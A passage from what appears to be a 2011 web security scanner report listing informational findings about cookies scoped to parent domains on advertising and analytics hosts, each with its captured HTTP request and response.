The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&type=gif&csid=K10145 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305608&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw
+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsiPus_8M_3="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"; rsi_us_1000000="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"; rsi_segs_1000000=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; rtc_VOiH=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

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_8M_3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_8M_3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_yRO_="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1274605&id=56918&id=315889&id=715901&id=1023315&id=725071&id=1268392&id=1198035&id=1049794&id=74560&id=593881&id=1264419&id=86237&id=926097&id=1006089&id=1196051&id=1147048&id=1086731&id=1284585&id=1086733&id=1044410&id=1093100&id=1063912&id=397181&id=1044578&id=1063916&id=1041270&id=1049769&id=1049770&id=596293&id=576685&id=1044587&id=596291&id=1049772&id=1063911&id=1063910&t=2
Content-Length: 0
Date: Mon, 09 May 2011 01:09:55 GMT


12.18. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&type=gif&csid=K10145 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305608&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=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; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsiPus_nlnh="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"; rsi_us_1000000="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"; rsi_segs_1000000=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; rtc_dGQ8=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

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nlnh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_nlnh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_qnR8="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1274605&id=56918&id=315889&id=715901&id=1023315&id=725071&id=1268392&id=1198035&id=1049794&id=1238051&id=74560&id=593881&id=1264419&id=86237&id=926097&id=1006089&id=1196051&id=1147048&id=1086731&id=1284585&id=1086733&id=1044410&id=1093100&id=1063912&id=397181&id=1044578&id=1063916&id=1041270&id=1049769&id=1049770&id=596293&id=576685&id=1044587&id=596291&id=1049772&id=1063911&id=1063910&t=2
Content-Length: 0
Date: Mon, 09 May 2011 01:17:54 GMT


12.19. http://at.amgdgt.com/ads/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /ads/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/?t=pp&px=13078&rnd=[cachebuster] HTTP/1.1
Host: at.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305606&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUB0TYJEwPaU_7WDI3ccZVAq.0_foDA3gBY2BgEGFgWnCTgSW7jYGR9zsDww0XBgYGTgYGRv0j_xZYQeVagXI_gHKuMLlNHp0ZuPRtvBk3GSrXAtT3E6jPDaZvo_lNE5z6zNP1cctJMDAwdS4BurMZaOYvoJnuMDMn6Uf4Q.Uw3NnLsc0bKofhll4Ol35cch3ZMadwyiW5XccpF.F1Daec34QQnHKuDRxQOYx46JBwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgETDcGXHKV3YLAeUZfA9bMTBwABPSTkYeRgaGwFuMfECKwYCbgZGZhYWflZGNkZ2Rg5GTkYuRG6xCwQxMLS0AK2TJZBQEqmcJYRJkFAIy5HdxsrBgagKnUWuQfQwMANDqkkE-

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUinufEXt9HLZETnIErylkCGzd0C4DA3gBY2BgEGFgWnCTgSW7jYGR9zsDww0XBgYGTgYGRv0j_xZYQeVagXI_gHKuMLlNHp0ZuPRtvBk3GSrXAtT3E6jPDaZvo_lNE5z6zNP1cctJMDAwdS4BurMZaOYvoJnuMDMn6Uf4Q.Uw3NnLsc0bKofhll4Ol35cch3ZMadwyiW5XccpF.F1Daec34QQnHKuDRxQOYx46JBwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgETDcGXHKV3YLAeUZfI_rNYBSUeAtRkFGYHraycgPpBgMeJgZWZnZ.NkZORg5GbkYuRl5GHkZ.cCSLJmMIkA1SwvAOhTMIIIhTCKMokBh.V1cbMzYtC12ZwQ6B5hcL7kuuwKymoEBAFhQk_g-; Domain=.amgdgt.com; Expires=Wed, 08-Jun-2011 01:01:10 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://ib.adnxs.com/seg?add=99220&t=2
Content-Length: 0
Date: Mon, 09 May 2011 01:01:09 GMT


12.20. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=7&c2=8097938&rn=1235633084&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fww30.1800baskets.com%252Fproduct.do%253FbaseCode%253D93260%2526dataset%253D11309%26jsref%3Dhttp%253A%252F%252Fww30.1800baskets.com%252Ftemplate.do%253Fid%253Dtemplate3%2526page%253D2000%26rnd%3D1304903453531&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Fww30.1800baskets.com%2Fproduct.do%3FbaseCode%3D93260%26dataset%3D11309&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fww30.1800baskets.com%2Fproduct.do%3FbaseCode%3D93260%26dataset%3D11309&jsref=http%3A%2F%2Fww30.1800baskets.com%2Ftemplate.do%3Fid%3Dtemplate3%26page%3D2000&rnd=1304903453531
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 09 May 2011 01:18:23 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 08-May-2013 01:18:23 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


12.21. http://ib.adnxs.com/seg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add=99220&t=2 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305606&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-sEBEAoYCiAKKAowg_iG7gQQg_iG7gQYCQ..; anj=Kfu=8fG10Qgj[2<?0P(*AuB-u**g1:XICajEhzW()U9M1kUGf3$2.f0R>9.acl`F4%p2Nl.UXEE*e?s.KZk)1P8:JhD>3]0OXNzmEri$NP^zjJv16.uOiiIAJm'i/?`wtMan.OL7JR%9_Qi'sH?P8)dD_cwkfN=J6^G_S2VZyFVB)VG2Vw2thPTUbP<wWYepcQ?p3>xz(+n$Re8'MY-mhu#.Xt]9[@nN+Ds+7'8q_!*9MdOq3NdJdss.Hj'/sFJ<-+z3E0EE7j)M961RbGb1dj#L@[9dW/NyqWx!_x)fy):[Aa=QO!jG:eNKR)GNwxNn+ffW'EqWJgi1p9#uqJ2MdA<fq#d/OW8$mC<6O.FQ6^>L-!w71A$]900:P$P<mQfUC(KA9X.t8gFMHTn1=0S6u_D96a?e(y#41L9alTN8lk+phc8qcDDwI#ht*Ojk$^h/f:4!*=PA8ETumU6=Lq?'LZXd)U<toDTN:^atTHtT9bQ$L$A.Vxr9-Ty'Y$?/v<XcvtB4/?l*9vZEk.r)kLPE6cj7OE<Wt?Q*xbt7KIuF6C=Ld+zNWABEs>Sa5%-[[n4b1!c`; uuid2=2724386019227846218

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 01:02:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 01:02:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 01:02:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(B>?r>)Wh]!7Le!'.dm=2-d(cr<N=i9KW%L:e76g3o>[E)HRW4I=4+GL0pFiQYDG)SQTQQt=Wze7KMy4SLmU1$q`<%zkDtGTvv07wDD'4p1+]t1Fr=)hXH9UcMhc2vLyT<qvUI(RNJ##CCaO7zh)X!wr:OQg%hvnsVkA)_@wnpV2gTH9XdHO0+jZ^LHe:gGW[d%ucxR>`]wQJkiUJd*48d+/b^#=L>1gNc%^[j67VIBkl+:o9wPOnS_'N2cAs+2.D1i3Fw''=O2H7WbunxPoQy$tq(yXAKH74WPoNn(e:g`jCMSaJqvN)#uGkG#c3$GGXWx7.r5xI@[:bBBFR8=rbwMo5?kyXDAkUwc14=YBGq1Hht6P3N$$u8DSmGwX6Bw$_@QJ3nJ`HLp:*F)+8QtMHxNyN8Z5'Nn`jT7hw*[QA5DIt]`32Et8:-!?vdXp!80J?]?)H9j1h[/MvP_!<3In.eh6bzHRMEQTt*Z=Q:[_91O*l'*BcQd!(]!-Z2hIM*:wXf5+uWxmeZPL?8!=(+vsr]q[wwR0J`AN?]; path=/; expires=Sun, 07-Aug-2011 01:02:22 GMT; domain=.adnxs.com; HttpOnly
Location: http://ad.yieldmanager.com/pixel?id=1186978&t=2
Date: Mon, 09 May 2011 01:02:22 GMT
Content-Length: 0


12.22. http://idcs.interclick.com/Segment.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=b053470b-90a6-47ab-9052-d6a092e04e08 HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3006&abandon_products=91637
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=c3e2564e-78bb-4fe5-b016-9ebe8e804603; tpd=e20=1305834684215&e90=1303847484419&e50=1305834684416&e100=1303847484462; sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255&7472=734256&10677=734260

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255&7472=734256&10677=734260&9174=734264; domain=.interclick.com; expires=Sun, 09-May-2021 01:04:51 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 09 May 2011 01:04:51 GMT

GIF89a.............!.......,...........D..;

12.23. http://leadback.advertising.com/adcedge/lb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=birthdaysmiles_cs=1&betq=12580=431215 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305606&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; GUID=MTMwNDc2NzUwMjsxOjE2cjRvcHExdHZsa21sOjM2NQ; C2=jsYxN5pqDIxFG+sovQg3sYIdSK8BItdxPfQ3WX8zHsY4F/8Bw3gxPfQ7NY8zHoLOG/8BKGexPfwmhX8zH8eDG/8BdDmxPfwohX8zHQY4F/8BYimxPfA3Wa8zHoa4F/8BA9qxPfgdeZ8zH4fFG/8BbTexPfwKOa8zHoN5F/8BC9qxPfwtZa8zHE0rG/8BFBqxPfQTaa8zHY4dG/8BNLqxPXrqEoxsGSXtrSQIzaEoRGABg2cBJbm5IaAqxOCBsRpxg2I9IsfzFA3i4SQBwWY0ltCqGkNseSw7Ra83VSPBrLqhRPJUEQT2F/NruTQAzZ830KHBbzqxfn6BE8sXG/NogVwrgYQZzWdBkoqhzO67FcNNGuekAbwuRXA1um/BEOphBMLUHsEpGyAq+fQoeZsEfO8BgwhR6U7/HUJtGgZZpTrBQHqFH09IG4co8ew5qY8zY6wBsMiRteAnjaUrHEv9F1aqGhQ9fZ8WFirZDugBoC; F1=B8ziF3kAAAAAgCsCAEAAgEABAAAABAAAAMAAgEA; BASE=Rgwq9yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2unWu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp1J!; ROLL=boAnq2C+ORAgHEGte/mz/DHyJN5VpuB!

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 01:01:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=NzzxN5pqDIxFGMnovQg3sYAGSK8BItdRzdQ3WX0cHsY4FN3Bw3gRzdQ7NY0cHoLOGN3BKGeRzdwmhX0cH8eDGN3BdDmRzdwohX0cHQY4FN3BYimRzdA3Wa0cHoa4FN3BA9qRzdgdeZ0cH4fFGN3BbTeRzdwKOa0cHoN5FN3BC9qRzdwtZa0cHE0rGN3BFBqRzdQTaa0cHY4dGN3BNLqRzVrqEoxsGgRtrSQIza8QRGABg2chsZm5Ia4SxOCBsRpRE1I9IsfzFOxi4SQBwWQdltCqGyHseSw7Ra0gVSPBrLqB1NJUEQT2FNIruTQAzZ0g0KHBbzqRDm6BE8sXGNIogVwrgYICzWdBkoqBXN67FcNNG8YkAbwuRX4dumvBEOpBlOLUGsEpGALq+bQoeZktfOsBgwhxdX7/HUJtGuTZpTrhzFqFH09IGGXo8ew5qY0cY6wBsMixQdAnjaMUHEv9FDVqGdQ9fZ0/FirZDughLFLJI8GlGAH; domain=advertising.com; expires=Wed, 08-May-2013 01:01:01 GMT; path=/
Set-Cookie: GUID=MTMwNDkwMjg2MTsxOjE2cjRvcHExdHZsa21sOjM2NQ; domain=advertising.com; expires=Wed, 08-May-2013 01:01:01 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Mon, 09 May 2011 02:01:01 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

12.24. http://metrics.ftd.com/b/ss/ftdprod/1/H.4-pdv-2/s48131725573912

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.ftd.com
Path:   /b/ss/ftdprod/1/H.4-pdv-2/s48131725573912

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/ftdprod/1/H.4-pdv-2/s48131725573912?[AQB]&ndh=1&t=8/4/2011%2020%3A0%3A34%200%20300&ns=ftdcom&pageName=Home%20Page&g=http%3A//www.ftd.com/&r=http%3A//www.ftd.com/&cc=USD&events=event13&c1=351&v1=351&c2=Main%20Site&v2=Main%20Site&c3=Main%20Site&v3=Main%20Site&c4=Main&v4=Main&c5=351%3AHome%20Page&c6=Main%20Site%3AHome%20Page&c7=Main%20Site%3AHome%20Page&c8=Main%3AHome%20Page&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: metrics.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; fsr.a=1304902834223; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 01:00:37 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E39E5A851D2CAB-6000010360000EE4[CE]; Expires=Sat, 7 May 2016 01:00:37 GMT; Domain=.ftd.com; Path=/
